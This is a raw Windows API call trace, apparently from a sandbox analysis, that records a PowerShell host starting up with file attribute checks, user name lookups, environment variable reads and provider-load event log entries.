	[0780.123] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d420 | out: lpFileInformation=0x24d420*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.123] SetErrorMode (uMode=0x1) returned 0x1
	[0780.123] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.123] SetErrorMode (uMode=0x1) returned 0x1
	[0780.123] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d420 | out: lpFileInformation=0x24d420*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.126] SetErrorMode (uMode=0x1) returned 0x1
	[0780.126] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.126] SetErrorMode (uMode=0x1) returned 0x1
	[0780.126] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d4c0 | out: lpFileInformation=0x24d4c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.127] SetErrorMode (uMode=0x1) returned 0x1
	[0780.127] CoTaskMemAlloc (cb=0x804) returned 0x1b8fc8f0
	[0780.127] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fc8f0, nSize=0x24d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d8c8) returned 0x1
	[0785.171] CoTaskMemFree (pv=0x1b8fc8f0) 
	[0785.171] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0785.171] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d908) returned 1
	[0785.171] CoTaskMemFree (pv=0x4c7640) 
	[0785.172] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cae438*="FileSystem", lpRawData=0x2cae1c8) returned 1
	[0785.893] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0785.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.893] CoTaskMemFree (pv=0x51cbd0) 
	[0785.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.895] CoTaskMemAlloc (cb=0x804) returned 0x1b8fc8f0
	[0785.895] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fc8f0, nSize=0x24d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d8c8) returned 0x1
	[0785.896] CoTaskMemFree (pv=0x1b8fc8f0) 
	[0785.896] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0785.896] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d908) returned 1
	[0785.896] CoTaskMemFree (pv=0x4c7640) 
	[0785.897] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cb4120*="Function", lpRawData=0x2cb3eb0) returned 1
	[0786.112] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0786.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.112] CoTaskMemFree (pv=0x51cbd0) 
	[0786.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0786.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0786.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0786.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.214] CoTaskMemAlloc (cb=0x804) returned 0x1b8fc8f0
	[0789.214] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fc8f0, nSize=0x24d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d8c8) returned 0x1
	[0789.215] CoTaskMemFree (pv=0x1b8fc8f0) 
	[0789.215] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0789.215] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d908) returned 1
	[0789.215] CoTaskMemFree (pv=0x4c7640) 
	[0789.216] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ce64f8*="Registry", lpRawData=0x2ce6288) returned 1
	[0790.044] CoTaskMemAlloc (cb=0x804) returned 0x1b8fc8f0
	[0790.044] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fc8f0, nSize=0x24d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d8c8) returned 0x1
	[0790.044] CoTaskMemFree (pv=0x1b8fc8f0) 
	[0790.044] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0790.044] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d908) returned 1
	[0790.044] CoTaskMemFree (pv=0x4c7640) 
	[0790.045] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ceb910*="Variable", lpRawData=0x2ceb6a0) returned 1
	[0790.275] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0790.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.275] CoTaskMemFree (pv=0x51cbd0) 
	[0790.275] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0790.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.275] CoTaskMemFree (pv=0x51cbd0) 
	[0790.314] CoTaskMemAlloc (cb=0x804) returned 0x1b8fc8f0
	[0790.314] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fc8f0, nSize=0x24d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d8c8) returned 0x1
	[0791.217] CoTaskMemFree (pv=0x1b8fc8f0) 
	[0791.217] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0791.217] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d908) returned 1
	[0791.218] CoTaskMemFree (pv=0x4c7640) 
	[0791.218] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cff528*="Certificate", lpRawData=0x2cff2b8) returned 1
	[0792.008] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0792.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.008] CoTaskMemFree (pv=0x51cbd0) 
	[0792.011] GetLogicalDrives () returned 0x4
	[0792.011] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d550, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0792.012] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0792.013] CoTaskMemAlloc (cb=0x20e) returned 0x5181b0
	[0792.013] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x5181b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0792.013] CoTaskMemFree (pv=0x5181b0) 
	[0792.014] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0792.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.014] CoTaskMemFree (pv=0x51cbd0) 
	[0792.015] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0792.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.015] CoTaskMemFree (pv=0x51cbd0) 
	[0792.032] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0792.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.032] CoTaskMemFree (pv=0x51cbd0) 
	[0792.034] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0792.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.034] CoTaskMemFree (pv=0x51cbd0) 
	[0792.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0792.035] SetErrorMode (uMode=0x1) returned 0x1
	[0792.035] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d510 | out: lpFileInformation=0x24d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.435] SetErrorMode (uMode=0x1) returned 0x1
	[0793.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.435] SetErrorMode (uMode=0x1) returned 0x1
	[0793.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d510 | out: lpFileInformation=0x24d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.435] SetErrorMode (uMode=0x1) returned 0x1
	[0793.436] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0793.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.436] CoTaskMemFree (pv=0x51cbd0) 
	[0793.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.439] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.439] SetErrorMode (uMode=0x1) returned 0x1
	[0793.439] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d4d0 | out: lpFileInformation=0x24d4d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.439] SetErrorMode (uMode=0x1) returned 0x1
	[0793.439] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.439] SetErrorMode (uMode=0x1) returned 0x1
	[0793.439] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d4d0 | out: lpFileInformation=0x24d4d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.439] SetErrorMode (uMode=0x1) returned 0x1
	[0793.439] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.440] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.440] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.440] SetErrorMode (uMode=0x1) returned 0x1
	[0793.440] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d4d0 | out: lpFileInformation=0x24d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0793.440] SetErrorMode (uMode=0x1) returned 0x1
	[0793.440] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.440] SetErrorMode (uMode=0x1) returned 0x1
	[0793.440] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d4d0 | out: lpFileInformation=0x24d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0793.440] SetErrorMode (uMode=0x1) returned 0x1
	[0793.440] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.441] SetErrorMode (uMode=0x1) returned 0x1
	[0793.441] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d4d0 | out: lpFileInformation=0x24d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.441] SetErrorMode (uMode=0x1) returned 0x1
	[0793.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.441] SetErrorMode (uMode=0x1) returned 0x1
	[0793.441] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d4d0 | out: lpFileInformation=0x24d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.441] SetErrorMode (uMode=0x1) returned 0x1
	[0793.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.442] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.442] SetErrorMode (uMode=0x1) returned 0x1
	[0793.442] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d510 | out: lpFileInformation=0x24d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0793.442] SetErrorMode (uMode=0x1) returned 0x1
	[0793.442] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.442] SetErrorMode (uMode=0x1) returned 0x1
	[0793.442] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d510 | out: lpFileInformation=0x24d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0793.442] SetErrorMode (uMode=0x1) returned 0x1
	[0793.442] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0793.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.443] SetErrorMode (uMode=0x1) returned 0x1
	[0793.443] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d510 | out: lpFileInformation=0x24d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.443] SetErrorMode (uMode=0x1) returned 0x1
	[0793.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.443] SetErrorMode (uMode=0x1) returned 0x1
	[0793.443] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d510 | out: lpFileInformation=0x24d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.443] SetErrorMode (uMode=0x1) returned 0x1
	[0793.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.446] SetErrorMode (uMode=0x1) returned 0x1
	[0793.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d7d0 | out: lpFileInformation=0x24d7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.446] SetErrorMode (uMode=0x1) returned 0x1
	[0793.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
